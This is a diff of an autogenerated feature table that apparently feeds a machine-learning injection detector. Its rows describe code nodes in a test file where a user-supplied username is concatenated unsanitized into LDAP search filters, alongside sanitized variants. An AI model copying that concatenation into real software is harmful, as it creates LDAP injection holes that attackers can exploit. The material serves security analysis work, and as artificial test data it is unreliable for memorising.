autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:9:65:3 | parsedFilter | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:9:65:3 | parsedFilter | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:9:65:3 | parsedFilter | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:24:63:27 | ldap | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:24:63:27 | ldap | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:24:63:27 | ldap | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:24:63:27 | ldap | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:24:63:27 | ldap | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:24:63:39 | ldap.parseFilter | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:24:63:39 | ldap.parseFilter | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:24:63:39 | ldap.parseFilter | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:24:63:39 | ldap.parseFilter | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:24:63:39 | ldap.parseFilter | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:24:65:3 | exceptional return of ldap.pa ... ))`\\n ) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:24:65:3 | exceptional return of ldap.pa ... ))`\\n ) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:24:65:3 | exceptional return of ldap.pa ... ))`\\n ) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:24:65:3 | exceptional return of ldap.pa ... ))`\\n ) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:24:65:3 | exceptional return of ldap.pa ... ))`\\n ) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:24:65:3 | ldap.pa ... ))`\\n ) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:24:65:3 | ldap.pa ... ))`\\n ) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:24:65:3 | ldap.pa ... ))`\\n ) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:24:65:3 | ldap.pa ... ))`\\n ) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:24:65:3 | ldap.pa ... ))`\\n ) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:29:63:39 | parseFilter | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:29:63:39 | parseFilter | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:29:63:39 | parseFilter | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:29:63:39 | parseFilter | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:29:63:39 | parseFilter | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:5:64:49 | `(\|(nam ... ame}))` | CalleeFlexibleAccessPath | ldap.parseFilter | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:5:64:49 | `(\|(nam ... ame}))` | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:5:64:49 | `(\|(nam ... ame}))` | calleeImports | ldapjs | @@ -1137,6 +6199,61 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:5:64:49 | `(\|(nam ... ame}))` | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:5:64:49 | `(\|(nam ... ame}))` | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:5:64:49 | `(\|(nam ... ame}))` | receiverName | ldap | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:6:64:13 | (\|(name= | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:6:64:13 | (\|(name= | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:6:64:13 | (\|(name= | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:6:64:13 | (\|(name= | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:6:64:13 | (\|(name= | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:6:64:13 | (\|(name= | stringConcatenatedWith | -endpoint- username + ')(username=' + username + '))' | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:16:64:23 | username | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:16:64:23 | username | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:16:64:23 | username | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:16:64:23 | username | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:16:64:23 | username | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:16:64:23 | username | stringConcatenatedWith | '(\|(name=' -endpoint- ')(username=' + username + '))' | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:25:64:35 | )(username= | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:25:64:35 | )(username= | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:25:64:35 | )(username= | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:25:64:35 | )(username= | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:25:64:35 | )(username= | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:25:64:35 | )(username= | stringConcatenatedWith | '(\|(name=' + username -endpoint- username + '))' | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:38:64:45 | username | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:38:64:45 | username | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:38:64:45 | username | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:38:64:45 | username | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:38:64:45 | username | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:38:64:45 | username | stringConcatenatedWith | '(\|(name=' + username + ')(username=' -endpoint- '))' | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:47:64:48 | )) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:47:64:48 | )) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:47:64:48 | )) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:47:64:48 | )) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:47:64:48 | )) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:64:47:64:48 | )) | stringConcatenatedWith | '(\|(name=' + username + ')(username=' + username -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:3:66:8 | client | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:3:66:8 | client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:3:66:8 | client | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:3:66:8 | client | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:3:66:8 | client | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:3:66:15 | client.search | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:3:66:15 | client.search | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:3:66:15 | client.search | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:3:66:15 | client.search | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:3:66:15 | client.search | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:3:66:78 | client. ... es) {}) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:3:66:78 | client. ... es) {}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:3:66:78 | client. ... es) {}) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:3:66:78 | client. ... es) {}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:3:66:78 | client. ... es) {}) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:3:66:78 | exceptional return of client. ... es) {}) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:3:66:78 | exceptional return of client. ... es) {}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:3:66:78 | exceptional return of client. ... es) {}) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:3:66:78 | exceptional return of client. ... es) {}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:3:66:78 | exceptional return of client. ... es) {}) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:10:66:15 | search | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:10:66:15 | search | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:10:66:15 | search | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:10:66:15 | search | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:10:66:15 | search | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:17:66:27 | "o=example" | CalleeFlexibleAccessPath | client.search | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:17:66:27 | "o=example" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:17:66:27 | "o=example" | calleeImports | ldapjs | @@ -1155,6 +6272,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:30:66:53 | { filte ... ilter } | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:30:66:53 | { filte ... ilter } | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:30:66:53 | { filte ... ilter } | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:32:66:37 | filter | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:32:66:37 | filter | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:32:66:37 | filter | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:32:66:37 | filter | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:32:66:37 | filter | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:32:66:51 | filter: parsedFilter | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:32:66:51 | filter: parsedFilter | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:32:66:51 | filter: parsedFilter | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:32:66:51 | filter: parsedFilter | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:32:66:51 | filter: parsedFilter | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:32:66:51 | filter: parsedFilter | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:32:66:51 | filter: parsedFilter | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:32:66:51 | filter: parsedFilter | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:32:66:51 | filter: parsedFilter | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:32:66:51 | filter: parsedFilter | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:40:66:51 | parsedFilter | CalleeFlexibleAccessPath | client.search | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:40:66:51 | parsedFilter | InputAccessPathFromCallee | 1.filter | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:40:66:51 | parsedFilter | InputArgumentIndex | 1 | @@ -1165,6 +6297,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:40:66:51 | parsedFilter | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:40:66:51 | parsedFilter | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:40:66:51 | parsedFilter | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:55 | this | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:55 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:55 | this | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:55 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:55 | this | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:77 | 'arguments' object of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:77 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:77 | 'arguments' object of anonymous function | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:77 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:77 | 'arguments' object of anonymous function | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:77 | exceptional return of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:77 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:77 | exceptional return of anonymous function | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:77 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:77 | exceptional return of anonymous function | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:77 | functio ... res) {} | CalleeFlexibleAccessPath | client.search | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:77 | functio ... res) {} | InputArgumentIndex | 2 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:77 | functio ... res) {} | calleeImports | ldapjs | @@ -1174,6 +6321,56 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:77 | functio ... res) {} | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:77 | functio ... res) {} | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:77 | functio ... res) {} | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:77 | return of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:77 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:77 | return of anonymous function | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:77 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:56:66:77 | return of anonymous function | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:66:66:68 | err | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:66:66:68 | err | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:66:66:68 | err | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:66:66:68 | err | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:66:66:68 | err | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:71:66:73 | res | contextFunctionInterfaces | sanitizeInput(input) | +| 